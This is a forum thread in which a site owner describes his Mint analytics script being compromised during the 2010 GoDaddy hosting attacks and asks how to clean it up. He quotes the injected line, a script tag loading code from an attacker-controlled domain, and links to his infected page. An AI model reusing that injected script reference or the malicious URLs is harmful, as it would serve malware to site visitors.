Mint Forum

First off, let me just say I know this has nothing to do with Mint. I’ve had it running on my site for some time now without incident. Also, I don’t wish to presume that a matter such as this would be categorized as a legitimate support issue. If that is indeed the case, I understand and apologize.

I just wanted to give a heads up to any other users out there who were unfortunate enough to chose Godaddy as their hosting service. If you don’t already know, last month Godaddy were hit by multiple attacks. You can read about them below. http://blog.sucuri.net/2010/05/here-we- … inues.html

My PHP based forum was hit and had to be completely purged. Thankfully, since my coding skills are horribly archaic, my HTML remained unscathed, or so I thought. Today one of my readers informed me that his A/V software flagged one of my HTML based pages. He provided me with the following link: PLEASE DON’T CLICK THIS ON A WINDOWS BASED MACHINE!!! http://crowsxworst.com/mint/?js

Upon closer inspection I noticed the following line of code at the end of the page: };Mint.save…script src=”http://holasionweb.com/oo.php”

Holasion.com were the ones responsible for these previously mentioned attacks. My question is, how the hell is this even possible?! It must have been inserted somewhere into the Mint directory, right? I reviewed a sample of my site’s pages after the attack to be certain it hadn’t been affected, but I never saw anything out of the ordinary. That mint java script looks completely banal on the surface. Or is it? To be honest, it’s been so long since I installed Mint, I don’t remember the exact snippet.

If there’s a way to quickly delete this without having to remove the mint js from every page, I’d love to know. If nothing else, maybe someone could tell me if that page I provided above is normal except for the final line with the attackers website?

Thank you for your time.

I understand that. I was just confused as to how this code was being executed. When I cleaned the forum I could physically SEE the line of malicious code inserted in config.php. Had I not been using a text editor that distinguished urls and images from other code, I would never have caught this. Upon closer inspection of index.php in my mint directory, I’m still not seeing the attack point. I guess I just don’t really have a grasp as to how the injection actually works. I won’t ask you to elaborate.

So, are you suggesting that I delete the entire mint directory and start from scratch? I won’t actually have to remove the .js from individual page headers?

Gotcha. With the forum I simply deleted all .php files then reinstalled. As I said, I’m a (horrible) “90’s coder”, so I assumed the main site was unaffected being html. I completely forgot about Mint.

After being alerted to this issue, I renamed my mint directory in order to keep readers safe. Now I can go about fixing it the proper way. I guess I’ll lose all my previous stats, but that’s not the end of the world.

Thank you for your help. I appreciate it.